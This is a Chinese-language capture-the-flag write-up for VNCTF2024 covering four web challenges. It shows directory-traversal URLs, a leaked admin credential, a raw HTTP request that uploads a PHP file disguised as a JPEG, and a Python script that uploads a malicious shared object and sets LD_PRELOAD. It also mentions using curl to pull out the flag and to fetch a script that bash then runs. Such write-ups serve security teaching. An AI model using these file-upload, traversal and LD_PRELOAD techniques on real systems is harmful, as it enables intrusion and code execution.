VNCTF2024 WriteUp¶
By V3g3t4ble
CutePath¶
http://manqiu.top:20912/#/../../../../
可以目录遍历
http://manqiu.top:20912/#/../../../..//home/ming
有个base64的文件名,解码是admin:gdgm.edu.cn@M1n9K1n9P@as
,登录
重命名/flag/flag/flag.txt
为../../../../../../../home/ming/share_main/flag.txt
TrySent¶
https://blog.hanayuzu.top/articles/37dacab4.html
照着抄就行了
POST /user/upload/upload HTTP/1.1
Host: target.com
Cookie: PHPSESSID=7901b5229557c94bad46e16af23a3728
Content-Length: 894
Sec-Ch-Ua: " Not;A Brand";v="99", "Google Chrome";v="97", "Chromium";v="97"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhx2kYAMYDqoTThz
Accept: */*
Origin: https://info.ziwugu.vip/
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://target.com/user/upload/index?name=icon&type=image&limit=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ja-CN;q=0.8,ja;q=0.7,en;q=0.6
Connection: close
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="id"
WU_FILE_0
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="name"
test.jpg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="type"
image/jpeg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="lastModifiedDate"
Wed Jul 21 2021 18:15:25 GMT+0800 (中国标准时间)
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="size"
164264
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/jpeg
JFIF
<?php phpinfo();?>
------WebKitFormBoundaryrhx2kYAMYDqoTThz--
codefever_again¶
https://www.ctfiot.com/95359.html
real word git
用curl
带出flag
flag.sh
curl下载然后执行,用bash
givenphp¶
from requests import post, get
import sys
file = {
"file": open("evil.so", "rb")
}
url = sys.argv[1]
response = post(
url=url,
files=file,
data={"upload": "upload"},
# proxies={"http":"http://127.0.0.1:8080"}
)
key = "LD_PRELOAD"
value = response.text.split(">")[-1]
# value=""
print("filename:", value)
url=f"{url}?challenge=challenge&key=LD_PRELOAD&value={value}&guess=%00lambda_1"
print("url:",url)
while True:
response=get(url)
if response.text.find("www")>0:
print(response.text)
break